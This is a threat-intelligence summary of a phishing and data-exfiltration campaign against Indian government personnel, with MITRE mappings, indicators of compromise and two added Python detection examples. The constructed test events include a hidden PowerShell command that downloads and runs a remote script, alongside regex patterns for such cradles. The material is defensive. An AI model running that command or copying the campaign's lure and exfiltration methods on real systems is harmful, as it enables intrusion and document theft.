Seqrite researchers document a targeted phishing campaign against Indian government personnel since Oct 2023, deploying Rust-based payloads and encrypted PowerShell to enumerate and exfiltrate documents to a web-based service. The operation shows overlaps with Pakistan-linked APT groups and uses fake government domains and decoy forms to lure victims. #OperationRusticWeb #OshiUpload
Keypoints
- Indian government and defence sector entities have been targeted since Oct 2023 with Rust-based payloads and encrypted PowerShell that enumerate documents and exfiltrate them to web services.
- Operation RusticWeb overlaps with Pakistan-linked groups such as Transparent Tribe (APT36) and SideCopy, sharing tactics and decoys with their earlier campaigns.
- The actors have shifted from traditional languages to Golang, Rust, and Nim, which compile for several platforms and are less likely to be caught by signatures written for the older tooling.
- Infection Chain 1 starts with a spear-phishing archive (IPR_2023-24.pdf.zip) containing a malicious shortcut (IPR_2023-24.pdf.lnk) that fetches a PowerShell script from a fake AWES scholarship domain (awesscholarship.in).
- The PowerShell stage drops decoy documents (AWES/IAS themed), writes a log of its activity, then downloads and executes the next stages, ending in a Rust-compiled final payload.
- Infection Chain 2 uses maldocs whose VBA macros run encrypted PowerShell; the lures include a fake Parichay domain (parichay.epar.in, mimicking the government portal parichay.nic.in) and other government decoys, with persistence via the Startup folder and exfiltration to OshiUpload and Firebase-backed services.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link - the victim is led via a spear-phishing link to an archive file named "IPR_2023-24". From the report: "The attacker targets the victim via spear-phishing leading to an archive file named 'IPR_2023-24'."
- [T1059.001] Command and Scripting Interpreter: PowerShell - the PowerShell script first sets up URL paths for the next-stage payloads and the lure document. From the report: "PowerShell script begins with setting up URL paths for downloading the subsequent stage payloads along with the lure document."
- [T1105] Ingress Tool Transfer - payloads are downloaded and executed from remote locations (e.g., the rb[.]gy shortener) to stage the infection.
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - the final payload persists by being placed in the Startup directory.
- [T1036.007] Masquerading: Double File Extension - the shortcut is named IPR_2023-24.pdf.lnk; with Explorer's default of hiding known extensions it appears to be a PDF.
- [T1027.010] Obfuscated Files or Information: Command Obfuscation - encrypted PowerShell commands and obfuscated IEX / Invoke-Obfuscation patterns in the maldocs.
- [T1016] System Network Configuration Discovery - the Rust downloader queries ifconfig.me for the victim's public IP and records it in its log.
- [T1033] System Owner/User Discovery - the log captures user and domain context during the system checks.
- [T1083] File and Directory Discovery - the payload enumerates documents and archives, filtering on a list of targeted file types.
- [T1005] Data from Local System - the enumerated documents and archives are collected for exfiltration.
- [T1567] Exfiltration Over Web Service - logs and files are uploaded to public file-sharing services such as OshiUpload (oshi.at).
- [T1041] Exfiltration Over C2 Channel - the web services that stage the payloads also receive the collected data; the uploads to OshiUpload and Firebase map more precisely to T1567.002 (Exfiltration to Cloud Storage).
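Detection logic for the techniques above, as an added example that is not part of the Seqrite report or this page: the events are constructed Sysmon-style records (ProcessCreate, NetworkConnect, FileCreate) that mimic the steps the technique list describes. The file paths, the benign noise events, the drop location C:\ProgramData\syscheck\MySystem.exe and the extra external-IP services (api.ipify.org, icanhazip.com) are assumptions; only ifconfig.me, oshi.at, rb.gy and the two fake domains come from the page.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events (not telemetry from the report). "id" follows
# Sysmon: 1 = ProcessCreate, 3 = NetworkConnect, 11 = FileCreate. Paths are stand-ins.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUST = r"C:\ProgramData\syscheck\MySystem.exe"  # assumed drop location of the Rust stage
SAMPLE_EVENTS = [
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\victim\Downloads\IPR_2023-24.pdf.lnk"},
    {"id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('https://rb.gy/gbfsi')\""},
    {"id": 3, "image": PS, "dest_host": "awesscholarship.in", "dest_port": 443},
    {"id": 3, "image": RUST, "dest_host": "ifconfig.me", "dest_port": 443},
    {"id": 11, "image": RUST,
     "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MySystem.exe"},
    {"id": 3, "image": RUST, "dest_host": "oshi.at", "dest_port": 443},
    # Benign noise that must not fire: an admin one-liner and ordinary browsing.
    {"id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": r"powershell.exe -c Get-ChildItem C:\temp"},
    {"id": 3, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "www.google.com", "dest_port": 443},
]

# T1036.007: a document extension followed by an executable one.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)\.(?:lnk|exe|scr|hta)$", re.I)
# T1059.001: download cradles; hidden window / policy bypass raise the severity.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biwr\b|\biex\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-enc", re.I)
# T1547.001: writes into the per-user Startup folder.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
# Hosts from the page's IOCs; the extra external-IP services are an assumption.
STAGING_DOMAINS = {"rb.gy", "awesscholarship.in", "parichay.epar.in"}
EXTERNAL_IP_SERVICES = {"ifconfig.me", "api.ipify.org", "icanhazip.com"}
FILE_DROP_SERVICES = {"oshi.at"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def check_event(ev):
    """Apply the per-event rules; returns a list of (technique_id, message)."""
    hits = []
    proc = _basename(ev["image"])
    if ev["id"] == 11:
        name = _basename(ev["target"])
        if DOUBLE_EXT.search(name):
            hits.append(("T1036.007", f"{proc} wrote double-extension file {name}"))
        if STARTUP_DIR.search(ev["target"]):
            hits.append(("T1547.001", f"{proc} wrote {name} into the Startup folder"))
    elif ev["id"] == 1:
        cmd = ev["cmd"]
        if proc.lower() == "powershell.exe" and CRADLE.search(cmd):
            sev = "high" if HIDDEN_WINDOW.search(cmd) else "medium"
            hits.append(("T1059.001", f"{sev}: download cradle spawned by "
                                      f"{_basename(ev['parent'])}: {cmd[:60]}"))
    elif ev["id"] == 3:
        host = ev["dest_host"].lower()
        if host in STAGING_DOMAINS:
            hits.append(("T1105", f"{proc} contacted staging domain {host}"))
        if host in EXTERNAL_IP_SERVICES:
            hits.append(("T1016", f"{proc} queried external-IP service {host}"))
        if host in FILE_DROP_SERVICES:
            hits.append(("T1567", f"{proc} connected to file-sharing service {host}"))
    return hits


def detect(events):
    """Run the rules over a stream of events and group hits by process image."""
    by_proc = defaultdict(list)
    for ev in events:
        for tech, msg in check_event(ev):
            by_proc[_basename(ev["image"]).lower()].append((tech, msg))
    return dict(by_proc)


def chain_score(alerts):
    """Number of distinct techniques seen on the host; several stages of this
    chain firing together is a far stronger signal than any single rule."""
    return len({tech for hits in alerts.values() for tech, _ in hits})


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for proc, hits in found.items():
        for tech, msg in hits:
            print(f"{proc:16} {tech:10} {msg}")
    print("distinct techniques:", chain_score(found))
```

Each rule on its own is noisy: download cradles and ifconfig.me lookups both appear in legitimate admin scripts, and Startup-folder writes come from installers. The score across rules is the useful alert, because this campaign produces a double-extension LNK, a hidden-window cradle, a staging-domain fetch, a public-IP lookup, a Startup write and a file-drop upload on the same host within minutes.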
Indicators of Compromise
- [Domain] awesscholarship.in, parichay.epar.in - domains hosting payloads and decoys
- [Domain] oshi.at - anonymous file-sharing service (OshiUpload) receiving exfiltrated data
- [IP] 89.117.188.126, 13.232.102.189 - IPs associated with the fake domains
- [URL] hxxps://rb.gy/gbfsi, hxxps://awesscholarship.in/upload/file.zip - URLs used to fetch payloads
- [MD5] 56cb95b63162d0dfceb30100ded1131a, 13ee4bd10f05ee0499e18de68b3ea4d5 - sample executable/file hashes
- [Filename] IPR_2023-24.pdf.zip, IPR_2023-24.pdf.lnk - lure archive and shortcut
- [PDB] syscheck.pdb, alam.pdb - debug paths left in the Rust-compiled payloads
- [Host] C:\ProgramData\syscheck\MySystem.exe, C:\ProgramData\Micro\logs.txt - dropped payload and activity log under ProgramData (the listing had its backslashes stripped; the separators are restored here and the split of the log path is inferred)
- [Domain] parichay.in - fake Parichay domain mimicking parichay.nic.in
- [URL] hxxps://parichay.epar.in/Win/1.pdf, hxxps://parichay.epar.in/Win/Mail_Check.ps1 - malicious document and PS1 hosted for deployment
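The indicators above are published defanged (hxxps here, rb[.]gy in the technique list), so matching them against telemetry needs refanging and some care with shared infrastructure. The following is an added example, not code from the report or the page: it refangs the page's IOCs, derives hostnames from the URL indicators, treats rb.gy as a shared shortener where only the exact URL counts (an assumption), and scans constructed proxy, firewall, EDR and mail log lines. The log lines and the MySystem.exe path in them are made up for the example.

```python
import re
from urllib.parse import urlparse

# IOCs as listed on the page, still defanged.
RAW_IOCS = {
    "domain": ["awesscholarship.in", "parichay.epar.in", "oshi.at", "parichay.in"],
    "ip": ["89.117.188.126", "13.232.102.189"],
    "url": ["hxxps://rb.gy/gbfsi", "hxxps://awesscholarship.in/upload/file.zip",
            "hxxps://parichay.epar.in/Win/1.pdf", "hxxps://parichay.epar.in/Win/Mail_Check.ps1"],
    "md5": ["56cb95b63162d0dfceb30100ded1131a", "13ee4bd10f05ee0499e18de68b3ea4d5"],
    "filename": ["IPR_2023-24.pdf.zip", "IPR_2023-24.pdf.lnk"],
}
# Assumption: shared URL shorteners are only an indicator as a full URL, never as a host.
SHORTENERS = {"rb.gy"}

# Constructed log lines (proxy / firewall / EDR / mail), not real telemetry.
SAMPLE_LOG = [
    "2023-10-12T09:14:03Z proxy src=10.0.0.5 GET https://rb.gy/gbfsi 302",
    "2023-10-12T09:14:05Z proxy src=10.0.0.5 GET https://awesscholarship.in/upload/file.zip 200",
    "2023-10-12T09:14:09Z proxy src=10.0.0.5 CONNECT cdn.parichay.epar.in:443",
    "2023-10-12T09:14:20Z fw src=10.0.0.5 dst=13.232.102.189 dport=443 action=allow",
    "2023-10-12T09:15:02Z edr host=WS01 md5=56CB95B63162D0DFCEB30100DED1131A image=C:\\ProgramData\\syscheck\\MySystem.exe",
    "2023-10-12T09:16:40Z mail from=ext attachment=IPR_2023-24.pdf.zip",
    "2023-10-12T09:17:00Z proxy src=10.0.0.7 GET https://rb.gy/abcd12 302",
    "2023-10-12T09:17:03Z proxy src=10.0.0.7 GET https://www.google.com/ 200",
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def refang(s):
    """Undo common defanging: hxxp(s) -> http(s); [.] (.) {.} -> .; [://] -> ://."""
    s = re.sub(r"^hxxp", "http", s, flags=re.I)
    return re.sub(r"[\[\(\{](\.|://|:)[\]\)\}]", r"\1", s)


def build_matcher(raw=RAW_IOCS):
    """Normalise the IOC set: refanged lower-case URLs, hosts (including hosts
    derived from URL indicators, minus shorteners), IPs, hashes and filenames."""
    urls = {refang(u).lower().rstrip("/") for u in raw["url"]}
    hosts = {d.lower() for d in raw["domain"]}
    for u in urls:
        h = urlparse(u).hostname
        if h and h not in SHORTENERS:
            hosts.add(h)
    return {"url": urls, "host": hosts, "ip": set(raw["ip"]),
            "md5": {h.lower() for h in raw["md5"]},
            "filename": {f.lower() for f in raw["filename"]}}


def host_matches(host, hosts):
    """Exact match or subdomain of an indicator domain."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in hosts)


def scan_line(line, m):
    """Return the sorted list of (kind, value) indicator hits in one log line."""
    hits = set()
    low = line.lower()
    for u in URL_RE.findall(line):
        if u.lower().rstrip("/") in m["url"]:
            hits.add(("url", u.rstrip("/")))
    for h in HOST_RE.findall(line):
        if host_matches(h, m["host"]):
            hits.add(("host", h.lower()))
    for ip in IP_RE.findall(line):
        if ip in m["ip"]:
            hits.add(("ip", ip))
    for d in MD5_RE.findall(line):
        if d.lower() in m["md5"]:
            hits.add(("md5", d.lower()))
    for f in m["filename"]:
        if f in low:
            hits.add(("filename", f))
    return sorted(hits)


def scan(lines, matcher=None):
    """Map 1-based line number -> hits for every line that matched an indicator."""
    matcher = matcher or build_matcher()
    result = {}
    for n, line in enumerate(lines, 1):
        hits = scan_line(line, matcher)
        if hits:
            result[n] = hits
    return result


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

Two details matter in practice: the host check uses suffix matching so that any subdomain of a fake domain counts, and the shortener exclusion keeps the second rb.gy line (a different short link) from firing. Hash matching is case-insensitive because EDR products disagree on hex case.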